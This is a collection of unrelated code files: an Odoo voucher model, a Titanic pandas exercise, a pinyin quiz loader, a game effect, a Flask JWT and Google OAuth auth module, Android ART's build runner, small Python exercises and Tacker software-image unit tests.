            if order.state not in ('draft'):
                raise UserError(_('You can not delete receipt voucher'))
        return super(BiJournalVoucher, self).unlink()

    @api.multi
    def get_check_amount_in_words(self, amount):
        """Return *amount* spelled out in English words for cheque printing."""
        # TODO: merge, refactor and complete the amount_to_text and amount_to_text_en classes
        check_amount_in_words = amount_to_text_en.amount_to_text(amount, lang='en', currency='')
        check_amount_in_words = check_amount_in_words.replace('Cents', ' Only') # Ugh
        check_amount_in_words = check_amount_in_words.replace('Cent', ' Only')
        return check_amount_in_words

    @api.onchange('account_id')
    def OnchangeAccount(self):
        # NOTE(review): `tax_id` is not declared on this model (only on the
        # line model below) — confirm which record this onchange should target.
        for x in self:
            x.tax_id = self.account_id.tax_ids
#==================================================
# Class : BiAccountReceiptLine
# Description : Account Receipt Line
#==================================================
class BiAccountVoucherLine(models.Model):
    """Single debit/credit line of a journal voucher."""
    _name = "bi.journal.voucher.line"
    _description = "Journal Voucher Line"
    receipt_id = fields.Many2one('bi.journal.voucher',string="Receipt")
    tax_id = fields.Many2many('account.tax', string='Taxes', domain=['|', ('active', '=', False), ('active', '=', True)])
    account_id = fields.Many2one('account.account', domain=[] , string="Account ID", required=True)
    analytic_account_id = fields.Many2one('account.analytic.account',"Analytic Account")
    name = fields.Char(string="Description", required=True)
    credit_amount = fields.Float(string="Credit Amount", required=False)
    debit_amount = fields.Float(string="Debit Amount", required=False)
    currency_id = fields.Many2one('res.currency', related='receipt_id.currency_id', store=True, related_sudo=False)
    partner_id = fields.Many2one('res.partner', string = "Partner Account")
    # FIX: was `sql_constraints` (missing leading underscore), so the ORM never
    # installed these CHECK constraints; Odoo only reads `_sql_constraints`.
    _sql_constraints = [
        ('credit_debit1', 'CHECK (credit_amount*debit_amount=0)', 'Wrong credit or debit value in accounting entry !'),
        ('credit_debit2', 'CHECK (credit_amount+debit_amount>=0)', 'Wrong credit or debit value in accounting entry !'),
    ]

    @api.onchange('partner_id')
    def _onchange_partner_id(self):
        # Pre-fill the counterpart account from the partner's default
        # receivable/payable accounts.
        if self.partner_id:
            if self.partner_id.customer == True:
                self.account_id = self.partner_id.property_account_receivable_id.id
            if self.partner_id.supplier ==True:
                self.account_id = self.partner_id.property_account_payable_id.id
|
998,113 | 12b9cd5ad1a2e0b29ecf1b7df4b2bc8ef09641e0 | # -*- coding: utf-8 -*-
"""
Code Challenge
Name:
Titanic Analysis
Filename:
titanic.py
Dataset:
training_titanic.csv
Problem Statement:
It’s a real-world data containing the details of titanic ships
passengers list.
Import the training set "training_titanic.csv"
Answer the Following:
How many people in the given training set survived the disaster ?
How many people in the given training set died ?
Calculate and print the survival rates as proportions (percentage)
by setting the normalize argument to True.
Males that survived vs males that passed away
Females that survived vs Females that passed away
Does age play a role?
since it's probable that children were saved first.
Another variable that could influence survival is age;
since it's probable that children were saved first.
You can test this by creating a new column with a categorical variable Child.
Child will take the value 1 in cases where age is less than 18,
and a value of 0 in cases where age is greater than or equal to 18.
Then assign the value 0 to observations where the passenger
is greater than or equal to 18 years in the new Child column.
Compare the normalized survival rates for those who are <18 and
those who are older.
To add this new variable you need to do two things
1. create a new column, and
2. Provide the values for each observation (i.e., row) based on the age of the passenger.
Hint:
To calculate this, you can use the value_counts() method in
combination with standard bracket notation to select a single column of
a DataFrame
"""
# Importing pandas module as pd
# Importing pandas module as pd
import pandas as pd
try:
    # Reading training_titanic.csv file and storing it in a variable named titanic_df
    titanic_df = pd.read_csv("training_titanic.csv")
except FileNotFoundError as e:
    print(e)
else:
    # Counts of survivors vs. deaths (1 = survived, 0 = died).
    survival_counts = titanic_df['Survived'].value_counts()
    # Survival rates as proportions (normalize=True).
    survival_frequency = titanic_df['Survived'].value_counts(normalize=True)
    # Men's survival counts and rates
    Men_survival_counts = (titanic_df['Survived'])[titanic_df['Sex']=='male'].value_counts()
    Men_survival_frequency = (titanic_df['Survived'])[titanic_df['Sex']=='male'].value_counts(normalize=True)
    # Female survival counts and rates
    Female_survival_counts = (titanic_df['Survived'])[titanic_df['Sex']=='female'].value_counts()
    Female_survival_frequency = (titanic_df['Survived'])[titanic_df['Sex']=='female'].value_counts(normalize=True)
    # Add the Child indicator column, defaulting to 0 (adult).
    titanic_df['Child'] = 0
    # Fill missing numeric values with the column mean; numeric_only avoids a
    # TypeError on the string columns in recent pandas versions.
    titanic_df = titanic_df.fillna(titanic_df.mean(numeric_only=True))
    # FIX: the problem statement defines Child = 1 for passengers *under* 18,
    # but the original set it where Age > 18 (inverted) and used chained
    # indexing, which can assign to a temporary copy. .loc fixes both.
    titanic_df.loc[titanic_df['Age'] < 18, 'Child'] = 1
"""
# To create a dataframe where we have to fill 1 for age less than 18 and 0 for more than 18
a = titanic_df.loc[:, ['Age']]
a['Child'] = 'mising'
# A function to be passed in apply method for performing the above operation
def filter_data(value):
if 0 <= value <= 18:
return 1
else:
return 0
a['Child'] = a['Age'].apply(filter_data)
""" |
998,114 | 22bf197cf19246f3959ee8445732165990cd9c3a | #!/usr/bin/python3
# -*- coding: utf-8 -*-
#from test0 import test
from exams import quiz
import sys
# Load the semicolon-separated vocabulary file.
# Columns: chinese;pinyin;english;spanish;russian
# FIX: use a context manager so the file handle is closed.
with open('pinyin.csv', 'r', encoding='utf-8') as csv_file:
    csv = csv_file.read().split("\n")
language = 2 # default: english
if len(sys.argv) > 1: # some parameters introduced!
    if sys.argv[1] == "--spanish": language = 3
    elif sys.argv[1] == "--russian": language = 4
# Build an array made of dictionaries
dict_array = []
for line in csv:
    # FIX: skip blank lines (split("\n") leaves a trailing empty string that
    # previously raised IndexError); split each line once instead of thrice.
    if not line.strip():
        continue
    fields = line.split(";")
    dict_array.append({
        "chinese": fields[0],
        "pinyin": fields[1],
        "translation": fields[language]
        })
#test(dict_array) # uncomment for test porpouses
quiz(dict_array, language)
|
998,115 | 7bc909213c53c94b277d182f8db205ad08b8a236 | from core.effect.base import EffectBase
from core.helper import chance
from core.tuning.skill import SkillTuning
from raisecap.tuning.effect import EffectTuning
from siege import game, Locale
class Precision(EffectBase):
    """Buff that gives each of the owner's tool uses a chance to land with maximal power."""
    TUNING = EffectTuning.PRECISION

    @property
    def description(self):
        # Interpolate the (escaped) proc chance into the localized template.
        return Locale.getEscaped(Precision.TUNING.DESC).format(chance=Locale.getEscaped(self.chance))

    def __init__(self, owner, level, duration, source, isRefresh):
        super(Precision, self).__init__(owner, duration, isRefresh)
        # Proc chance is tuned per skill level (1-based level -> 0-based index).
        self.chance = SkillTuning.PRECISION.CHANCES[level - 1]
        if owner.isPlayer():
            # Hook the owner's tool power rolls; unhooked again in onRemove.
            owner.event['tool_power'].listen(self.handleToolPower)

    def handleToolPower(self, player, results, tool, power):
        # On a successful chance roll, force an effectively-maximal power result.
        if chance(self.chance):
            results.power = 9999

    def onRemove(self, owner):
        # Detach the listener registered in __init__ to avoid dangling callbacks.
        if owner.isPlayer():
            owner.event['tool_power'].remove(self.handleToolPower)

    @staticmethod
    def register():
        # Make this effect instantiable by name through the game's effect registry.
        game.effects.register(Precision.TUNING.NAME, Precision)
|
998,116 | 13ff5ad2c69dfe8bfc01aea24f67b73dbd222336 | ####### STANDARD/INSTALLED PACKAGES #######
from blogREST.common.utils import token_required
from flask import current_app, request, Flask, Blueprint, jsonify, redirect, url_for, session
from flask_restplus import Resource, Api, fields, Namespace
from flask_pymongo import PyMongo
from flask_dance.contrib.google import make_google_blueprint, google
import re
import jwt
import datetime
import hashlib
import bson
from bson.json_util import dumps
####### USER DEFINED PACKAGES #######
from blogREST.models.user import User
from blogREST.models.refresh import RefreshToken
from blogREST.models.api_model.user import get_user_model
from blogREST.common.utils import get_mongo_collection
api = Namespace(
'auth', description='Apis to authenticate and authorize users.')
userCollection = get_mongo_collection('User')
refreshTokenCollection = get_mongo_collection('RefreshToken')
# Api(auth_blueprint)
'''
API Models
'''
# Request body for /jwt/login.
loginModel = api.model('Login', {
    'username': fields.String(required=True),
    'password': fields.String(required=True)
})
# Response body returned by the token-issuing endpoints.
return_token_model = api.model('ReturnToken', {
    'access_token': fields.String(required=True),
    'refresh_token': fields.String(required=True)
})
'''
End of API Models
'''
@api.route('/oauth/login')
class googleLogin(Resource):
    """Log the user in via Google OAuth2 and cache their e-mail in the session."""

    def get(self):
        # NOTE(review): this blueprint is built but never registered with the
        # Flask app here — confirm registration happens elsewhere, otherwise
        # google.login below cannot resolve.
        auth_blueprint = make_google_blueprint(
            client_id=current_app.config['client_id'],
            client_secret=current_app.config['client_secret'],
            scope=[
                "https://www.googleapis.com/auth/plus.me",
                "https://www.googleapis.com/auth/userinfo.email",
                "https://www.googleapis.com/auth/userinfo.profile"
            ]
        )
        # Bounce through Google's consent screen until we hold a valid token.
        if not google.authorized:
            return redirect(url_for("google.login"))
        resp = google.get("/oauth2/v2/userinfo")
        assert resp.ok, resp.text
        # Remember who is logged in; the logout endpoint reads this back.
        session['user_id'] = resp.json()["email"]
        # return "You are {email} on Google".format(email=resp.json()["email"])
        return resp.json()
@api.route('/oauth/logout')
class googleLogout(Resource):
    """Revoke the Google OAuth2 token and clear the server-side session."""

    def get(self):
        # NOTE(review): a new blueprint is constructed here only to read its
        # token — confirm it shares state with the blueprint actually
        # registered on the app.
        auth_blueprint = make_google_blueprint(
            client_id=current_app.config['client_id'],
            client_secret=current_app.config['client_secret'],
            scope=[
                "https://www.googleapis.com/auth/plus.me",
                "https://www.googleapis.com/auth/userinfo.email",
                "https://www.googleapis.com/auth/userinfo.profile"
            ]
        )
        if not google.authorized:
            return {'message': 'You are not logged in! To login go to /api/login'}
        token = auth_blueprint.token["access_token"]
        email = session["user_id"]
        # Ask Google to revoke the access token server-side.
        resp = google.post('https://accounts.google.com/o/oauth2/revoke',
                           params={'token': token},
                           headers={
                               'content-type': 'application/x-www-form-urlencoded'}
                           )
        if resp.ok:
            session.clear()
            # logout_user()
            message = f'User {email} is successfully logged out'
            return {'message': message}
@api.route('/jwt/login')
class Log(Resource):
    """Issue a JWT access/refresh token pair for username+password logins."""

    def refresTokenGenerator(self, user_id, refresh_token, user_agent_hash):
        '''
        the following method is called to generate a bson object to insert into
        Refresh Token Collection.
        '''
        # NOTE(review): method name has a typo (refres -> refresh); renaming
        # would touch its caller below, so it is only flagged here.
        import collections  # From Python standard library.
        import bson
        from bson.codec_options import CodecOptions
        # refreshTokenJSON =
        # Round-trip the document through BSON so the stored record keeps a
        # deterministic (ordered) field layout.
        data = bson.BSON.encode({
            "user_id": user_id,
            "refresh_token": refresh_token,
            "user_agent_hash": user_agent_hash
        })
        decoded_doc = bson.BSON.decode(data)
        options = CodecOptions(document_class=collections.OrderedDict)
        decoded_doc = bson.BSON.decode(data, codec_options=options)
        return decoded_doc

    @api.expect(loginModel)
    @api.response(200, 'Success', return_token_model)
    @api.response(401, 'Incorrect username or password')
    def post(self):
        """
        This API implements JWT. Token's payload contain:
        'uid' (user id),
        'exp' (expiration date of the token),
        'iat' (the time the token is generated)
        """
        user = userCollection.find_one({"username": api.payload['username']})
        if not user:
            api.abort(401, 'Incorrect username or password')
        from blogREST.common.utils import check_password
        if check_password(user['password'], api.payload['password']):
            # Short-lived access token (15 min) + longer refresh token (30 min).
            _access_token = jwt.encode({'uid': user['uid'],
                                        'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=15),
                                        'iat': datetime.datetime.utcnow()},
                                       current_app.config['SECRET_KEY']).decode('utf-8')
            _refresh_token = jwt.encode({'uid': user['uid'],
                                         'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=30),
                                         'iat': datetime.datetime.utcnow()},
                                        current_app.config['SECRET_KEY']).decode('utf-8')
            # One refresh-token record per client, keyed by a hash of its
            # User-Agent string.
            user_agent_string = request.user_agent.string.encode('utf-8')
            user_agent_hash = hashlib.md5(user_agent_string).hexdigest()
            refresh_token = refreshTokenCollection.find_one(
                {"user_agent_hash": user_agent_hash})
            if not refresh_token:
                refresh_token = self.refresTokenGenerator(user_id=user['uid'], refresh_token=_refresh_token,
                                                          user_agent_hash=user_agent_hash)
                refreshTokenCollection.insert_one(refresh_token)
            else:
                refresh_token['refresh_token'] = _refresh_token
                refreshTokenCollection.update(
                    {"user_agent_hash": user_agent_hash}, refresh_token, upsert=True)
            return {'access_token': _access_token, 'refresh_token': _refresh_token}, 200
        api.abort(401, 'Incorrect username or password')
@api.route('/jwt/refresh')
class Refresh(Resource):
    """Exchange a valid refresh token for a fresh access/refresh token pair."""

    @api.expect(api.model('RefreshToken', {'refresh_token': fields.String(required=True)}), validate=True)
    @api.response(200, 'Success', return_token_model)
    def post(self):
        '''
        Call this api to refresh the token.
        '''
        old_refresh_token = api.payload['refresh_token']
        try:
            payload = jwt.decode(
                old_refresh_token, current_app.config['SECRET_KEY'])
            refresh_token = refreshTokenCollection.find_one(
                {"user_id": payload['uid'], "refresh_token": old_refresh_token})
            # find_one returns None when nothing matches; the previous
            # len(list(...)) check crashed on None and surfaced as an
            # "Unknown token error" instead of an invalid-token error.
            if not refresh_token:
                raise jwt.InvalidIssuerError
            # Generate new pair
            _access_token = jwt.encode({'uid': refresh_token['user_id'],
                                        'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=15),
                                        'iat': datetime.datetime.utcnow()},
                                       current_app.config['SECRET_KEY']).decode('utf-8')
            _refresh_token = jwt.encode({'uid': refresh_token['user_id'],
                                         'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=30),
                                         'iat': datetime.datetime.utcnow()},
                                        current_app.config['SECRET_KEY']).decode('utf-8')
            refresh_token['refresh_token'] = _refresh_token
            # Match the stored document by the OLD token: the previous code
            # filtered on the freshly generated token, so the update never
            # matched and the old refresh token was never rotated out.
            refreshTokenCollection.update(
                {"user_id": payload['uid'], "refresh_token": old_refresh_token}, refresh_token)
            return {'access_token': _access_token, 'refresh_token': _refresh_token}, 200
        except jwt.ExpiredSignatureError as e:
            raise e
        except (jwt.DecodeError, jwt.InvalidTokenError) as e:
            raise e
        except Exception:
            # Anything else is reported as a generic token failure (narrowed
            # from a bare except so KeyboardInterrupt/SystemExit pass through).
            api.abort(401, 'Unknown token error')
# This resource only for test
@api.route('/protected', doc=False)
class Protected(Resource):
    """Hidden endpoint used to exercise the token_required decorator."""

    @token_required
    def get(self, current_user):
        # token_required injects the authenticated user's document.
        return {'i am': 'protected', 'uid': current_user['uid']}
|
998,117 | 26be626185a0455e8c689e1622678bf526980d55 | #!/usr/bin/env python3
#
# Copyright 2017, The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Build and run go/ab/git_master-art-host target
This script is executed by the android build server and must not be moved,
or changed in an otherwise backwards-incompatible manner.
Provided with a target name, the script setup the environment for
building the test target by taking config information from
from target_config.py.
See target_config.py for the configuration syntax.
"""
import argparse
import os
import pathlib
import subprocess
import sys
from target_config import target_config
import env
# --- Command line ------------------------------------------------------------
parser = argparse.ArgumentParser()
parser.add_argument('-j', default='1', dest='n_threads')
# either -l/--list OR build-target is required (but not both).
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('build_target', nargs='?')
group.add_argument('-l', '--list', action='store_true', help='List all possible run-build targets.')
options = parser.parse_args()
##########
if options.list:
    print("List of all known build_target: ")
    for k in sorted(target_config.keys()):
        print(" * " + k)
    # TODO: would be nice if this was the same order as the target config file.
    sys.exit(1)
if not target_config.get(options.build_target):
    sys.stderr.write("error: invalid build_target, see -l/--list.\n")
    sys.exit(1)
target = target_config[options.build_target]
n_threads = options.n_threads
# Merge the target's extra environment into this process before any build step.
custom_env = target.get('env', {})
custom_env['SOONG_ALLOW_MISSING_DEPENDENCIES'] = 'true'
print(custom_env)
os.environ.update(custom_env)
# build is just a binary/script that is directly executed to build any artifacts needed for the
# test.
if 'build' in target:
    build_command = target.get('build').format(
        ANDROID_BUILD_TOP = env.ANDROID_BUILD_TOP,
        MAKE_OPTIONS='DX= -j{threads}'.format(threads = n_threads))
    sys.stdout.write(str(build_command) + '\n')
    sys.stdout.flush()
    # Any failing step aborts the whole run with a non-zero exit code.
    if subprocess.call(build_command.split()):
        sys.exit(1)
# make runs soong/kati to build the target listed in the entry.
if 'make' in target:
    build_command = 'build/soong/soong_ui.bash --make-mode'
    build_command += ' DX='
    build_command += ' -j' + str(n_threads)
    build_command += ' ' + target.get('make')
    if env.DIST_DIR:
        build_command += ' dist'
    sys.stdout.write(str(build_command) + '\n')
    sys.stdout.flush()
    if subprocess.call(build_command.split()):
        sys.exit(1)
if 'golem' in target:
    machine_type = target.get('golem')
    # use art-opt-cc by default since it mimics the default preopt config.
    default_golem_config = 'art-opt-cc'
    os.chdir(env.ANDROID_BUILD_TOP)
    cmd = ['art/tools/golem/build-target.sh']
    cmd += ['-j' + str(n_threads)]
    cmd += ['--showcommands']
    cmd += ['--machine-type=%s' %(machine_type)]
    cmd += ['--golem=%s' %(default_golem_config)]
    cmd += ['--tarball']
    sys.stdout.write(str(cmd) + '\n')
    sys.stdout.flush()
    if subprocess.call(cmd):
        sys.exit(1)
if 'run-test' in target:
    run_test_command = [os.path.join(env.ANDROID_BUILD_TOP,
                                     'art/test/testrunner/testrunner.py')]
    test_flags = target.get('run-test', [])
    # Resolve the soong output dir to an absolute path for flag substitution.
    out_dir = pathlib.PurePath(env.SOONG_OUT_DIR)
    if not out_dir.is_absolute():
        out_dir = pathlib.PurePath(env.ANDROID_BUILD_TOP).joinpath(out_dir)
    run_test_command += list(map(lambda a: a.format(SOONG_OUT_DIR=str(out_dir)), test_flags))
    # Let testrunner compute concurrency based on #cpus.
    # b/65822340
    # run_test_command += ['-j', str(n_threads)]
    # In the config assume everything will run with --host and on ART.
    # However for only [--jvm] this is undesirable, so don't pass in ART-specific flags.
    if ['--jvm'] != test_flags:
        run_test_command += ['--host']
        run_test_command += ['--dex2oat-jobs']
        run_test_command += ['4']
    if '--no-build-dependencies' not in test_flags:
        run_test_command += ['-b']
    run_test_command += ['--verbose']
    sys.stdout.write(str(run_test_command) + '\n')
    sys.stdout.flush()
    if subprocess.call(run_test_command):
        sys.exit(1)
sys.exit(0)
|
998,118 | 7d10827a017d7090c10bdc89bbae4dbaeafe0efe | import math
d = int(input())
# NOTE(review): this prints "OK" only when sqrt(d) is an even integer
# (256 -> 16 -> "OK"), which matches the samples below, but odd perfect
# squares (e.g. 225 -> 15) print "NG" — confirm that is the intended rule.
day = math.sqrt(d)
if day % 2 == 0:
    print("OK")
else:
    print("NG")
# 入力例1
# 256
# 出力例1
# OK
# 入力例2
# 255
# 出力例2
# NG |
998,119 | 3aa50d34a3689d9fbee1cf59b346fa054fa18b67 | print("Enter your name:")
# Read the user's name and age from stdin, then echo both back.
name = input()
print("Enter your age:")
age = input()
print(f"You entered: {name} {age}")
|
998,120 | 54bdf9404be5096358c6ce413a2fda26c6c3df7d | '''
请解析IP地址和对应的掩码,进行分类识别。要求按照A/B/C/D/E类地址归类,不合法的地址和掩码单独归类。
所有的IP地址划分为 A,B,C,D,E五类
A类地址1.0.0.0~126.255.255.255;
B类地址128.0.0.0~191.255.255.255;
C类地址192.0.0.0~223.255.255.255;
D类地址224.0.0.0~239.255.255.255;
E类地址240.0.0.0~255.255.255.255
私网IP范围是:
10.0.0.0~10.255.255.255
172.16.0.0~172.31.255.255
192.168.0.0~192.168.255.255
子网掩码为二进制下前面是连续的1,然后全是0。(例如:255.255.255.32就是一个非法的掩码)
注意二进制下全是1或者全是0均为非法
注意:
1. 类似于【0.*.*.】和【127.*.*.】的IP地址不属于上述输入的任意一类,也不属于不合法ip地址,计数时可以忽略
2. 私有IP地址和A,B,C,D,E类地址是不冲突的
输入:
多行字符串。每行一个IP地址和掩码,用~隔开。
输出:
统计A、B、C、D、E、错误IP地址或错误掩码、私有IP的个数,之间以空格隔开。
'''
#code
'''
A、B、C、D、E、错误IP地址或错误掩码、私有IP的个数.
坑点1:IP和掩码要同时合法才能算记作正常的类别,如果有一个不合法则都归于不合法类
坑点2:掩码转换为二进制时要考虑不足8位的情况,需要补齐
坑点3:'0.x.x.x'和'127.x.x.x'也需要判断掩码是否正常,只是忽略了IP而已
坑点4:公网IP和私网IP不冲突,需要同时归属
'''
# Counters: A-E address classes, invalid IP-or-mask lines, and private IPs.
a,b,c,d,e,err,private_ip = 0,0,0,0,0,0,0
def err_ip(list):
    """Return True if any octet of the dotted-quad IP is invalid.

    An octet is invalid when it is empty, not a plain decimal number, or
    greater than 255.  The non-digit check fixes a crash: int('abc') used
    to raise ValueError, which the caller's bare except silently turned
    into an early exit from the whole input loop.  Returns False (instead
    of the previous implicit None) for valid addresses; callers compare
    with == True, so this is compatible.
    """
    for i in list:
        if len(i) == 0 or not i.isdigit() or int(i) > 255:
            return True
    return False
def privateip(list):
    """Return True when the dotted-quad address is in a private range.

    Private ranges: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16.
    """
    def octet_ok(idx, low=0, high=255):
        # Bounds check for a single octet.
        return low <= int(list[idx]) <= high

    first = int(list[0])
    if first == 10:
        return octet_ok(1) and octet_ok(2) and octet_ok(3)
    if first == 172:
        return octet_ok(1, 16, 31) and octet_ok(2) and octet_ok(3)
    if first == 192:
        return int(list[1]) == 168 and octet_ok(2) and octet_ok(3)
    return False
def ipclass(list):
    """Return the class letter ('A'-'E') for the address, or None.

    First-octet ranges: A 1-126, B 128-191, C 192-223, D 224-239,
    E 240-255.  0.x.x.x and 127.x.x.x match no class; out-of-range
    later octets also yield None.
    """
    first = int(list[0])
    ranges = (('A', 1, 126), ('B', 128, 191), ('C', 192, 223),
              ('D', 224, 239), ('E', 240, 255))
    for letter, low, high in ranges:
        if low <= first <= high:
            if all(0 <= int(list[idx]) <= 255 for idx in (1, 2, 3)):
                return letter
            return None
    return None
def err_mask(list):
    """Return True if the subnet mask is invalid.

    A mask is invalid when any octet is not a decimal number in 0..255
    (previously unchecked: '256' slipped through as a 9-bit pattern and a
    non-numeric octet crashed the caller), when it is all ones or all
    zeros, or when its 32-bit pattern is not a contiguous block of 1s
    followed by 0s.
    """
    bits = ''
    for i in list:
        # Range-check each octet before rendering it as 8 binary digits.
        if not i.isdigit() or int(i) > 255:
            return True
        bits = bits + format(int(i), '08b')
    # All-ones and all-zeros masks are explicitly illegal.
    if '0' not in bits or '1' not in bits:
        return True
    # A legal mask never has a 1 after its first 0.
    if '1' in bits[bits.index('0'):]:
        return True
    else:
        return False
# Read "ip~mask" pairs from stdin until EOF and tally each category.
while True:
    try:
        ip,mask = input().split('~')
        ip_list = ip.split('.')
        mask_list = mask.split('.')
        # IP classification
        if (ip_list[0] == '0' or ip_list[0] == '127') and err_mask(mask_list) == False: # special addresses are ignored entirely
            pass
        elif (ip_list[0] == '0' or ip_list[0] == '127') and err_mask(mask_list) == True:
            err = err + 1
        elif err_ip(ip_list) == True or err_mask(mask_list) == True: # invalid IP or invalid mask
            err = err + 1
        else:
            # A valid line counts toward exactly one class, and may also
            # count as a private address.
            if ipclass(ip_list) == 'A':
                a = a + 1
            if ipclass(ip_list) == 'B':
                b = b + 1
            if ipclass(ip_list) == 'C':
                c = c + 1
            if ipclass(ip_list) == 'D':
                d = d + 1
            if ipclass(ip_list) == 'E':
                e = e + 1
            if privateip(ip_list) == True:
                private_ip = private_ip + 1
    except :
        # NOTE(review): this bare except treats EOF as the normal exit, but
        # it also swallows ValueError from malformed lines (e.g. non-numeric
        # mask octets), silently ending the loop early — confirm inputs.
        break
print(a,b,c,d,e,err,private_ip)
|
998,121 | 3057d997c71f44ba98e538f18aaa900730d8476f | # Copyright (c) 2019 NTT DATA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tacker.common import exceptions
from tacker import context
from tacker import objects
from tacker.tests.unit.db.base import SqlTestCase
from tacker.tests.unit.objects import fakes
from tacker.tests import uuidsentinel
class TestVnfSoftwareImages(SqlTestCase):
    """DB-backed unit tests for the VnfSoftwareImage versioned object."""
    # NOTE(review): "softwate" in several names below is a typo for
    # "software"; kept as-is since renaming would touch every test here.

    def setUp(self):
        super(TestVnfSoftwareImages, self).setUp()
        self.context = context.get_admin_context()
        # Software images hang off a deployment flavour, which hangs off a
        # package — create the chain bottom-up.
        self.vnf_package = self._create_vnf_package()
        self.vnf_deployment_flavour = self._create_vnf_deployment_flavour()
        self.vnf_softwate_images = self._create_vnf_softwate_images()

    def _create_vnf_package(self):
        # Persist a VnfPackage row built from the shared fake data.
        vnfpkgm = objects.VnfPackage(context=self.context,
                                     **fakes.vnf_package_data)
        vnfpkgm.create()
        return vnfpkgm

    def _create_vnf_deployment_flavour(self):
        # Persist a flavour linked to the package created in setUp.
        flavour_data = fakes.vnf_deployment_flavour
        flavour_data.update({'package_uuid': self.vnf_package.id})
        vnf_deployment_flavour = objects.VnfDeploymentFlavour(
            context=self.context, **flavour_data)
        vnf_deployment_flavour.create()
        return vnf_deployment_flavour

    def _create_vnf_softwate_images(self):
        # Persist a software image linked to the flavour created in setUp.
        software_image = fakes.software_image
        software_image.update(
            {'flavour_uuid': self.vnf_deployment_flavour.id})
        vnf_soft_image_obj = objects.VnfSoftwareImage(
            context=self.context, **software_image)
        vnf_soft_image_obj.create()
        return vnf_soft_image_obj

    def test_create(self):
        # create() should assign an id to a fresh object.
        software_image = fakes.software_image
        software_image.update(
            {'flavour_uuid': self.vnf_deployment_flavour.id})
        vnf_soft_image_obj = objects.VnfSoftwareImage(
            context=self.context, **software_image)
        vnf_soft_image_obj.create()
        self.assertTrue(vnf_soft_image_obj.id)

    def test_software_image_create_with_id(self):
        # Supplying an id up front must be rejected — ids are DB-generated.
        software_image = fakes.software_image
        software_image.update({'id': uuidsentinel.id})
        vnf_soft_image_obj = objects.VnfSoftwareImage(
            context=self.context, **software_image)
        self.assertRaises(
            exceptions.ObjectActionError,
            vnf_soft_image_obj.create)

    def test_get_by_id(self):
        vnf_software_images = objects.VnfSoftwareImage.get_by_id(
            self.context, self.vnf_softwate_images.id, expected_attrs=None)
        self.compare_obj(self.vnf_softwate_images, vnf_software_images)

    def test_get_by_id_with_no_existing_id(self):
        self.assertRaises(
            exceptions.VnfSoftwareImageNotFound,
            objects.VnfSoftwareImage.get_by_id, self.context,
            uuidsentinel.invalid_uuid)

    def test_attribute_with_valid_data(self):
        # obj_load_attr should lazily fetch 'name' from the DB by id.
        data = {'id': self.vnf_softwate_images.id}
        vnf_software_image_obj = objects.VnfSoftwareImage(
            context=self.context, **data)
        vnf_software_image_obj.obj_load_attr('name')
        self.assertEqual('test', vnf_software_image_obj.name)

    def test_invalid_attribute(self):
        self.assertRaises(exceptions.ObjectActionError,
                          self.vnf_softwate_images.obj_load_attr, 'invalid')

    def test_obj_load_attr_without_context(self):
        # Lazy-loading needs a context; without one the object is orphaned.
        data = {'id': self.vnf_softwate_images.id}
        vnf_software_image_obj = objects.VnfSoftwareImage(**data)
        self.assertRaises(exceptions.OrphanedObjectError,
                          vnf_software_image_obj.obj_load_attr, 'name')

    def test_obj_load_attr_without_id_in_object(self):
        # Lazy-loading also needs the id so the row can be located.
        data = {'name': self.vnf_softwate_images.name}
        vnf_software_image_obj = objects.VnfSoftwareImage(
            context=self.context, **data)
        self.assertRaises(exceptions.ObjectActionError,
                          vnf_software_image_obj.obj_load_attr, 'name')
|
998,122 | abac2fa97a42f4b3040cf3904ee985c099017ed2 | """
内容:集合
data:2019.6.19
"""
# 1. Braces denote a set literal when they hold plain values (no key:value
#    pairs); sets are unordered and keep only unique elements.
#    Beware: empty {} below actually creates a dict, not a set.
num1 = {}
print(num1)
num1 = {1,2,3,4,5}
print(num1)
set1 = {}
set2 = set([1,2,3,4,5,6])  # set() builds a set from an iterable such as a list
print(set1)
print(set2)
list1 = [1, 2, 3, 4, 4, 2, 7, 8, 9]
# Deduplicate a list by round-tripping through a set (order not guaranteed).
list1 = list(set([1, 2, 3, 4, 4, 2, 7, 8, 9]))
print(list1)
print(0 in list1)
# 4. Iterating a set: element order is arbitrary.  Small ints often come out
#    sorted, but that is an implementation detail; with strings the order is
#    visibly unordered.
set2 = {1, 3, 2, 4, 5, 9, 5, 7, 6, 8}
for i in set2:
    print(i, end=' ')
# frozenset builds an immutable (hashable) set.
set3 = frozenset({1,2,3,4})
|
998,123 | 1f9e8df064adaf93d6d7fa21e9bd687c4854c573 | """
MIT License
Copyright (c) 2020-2021 Ecole Polytechnique.
@Author: Khaled Zaouk <khaled.zaouk@polytechnique.edu>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
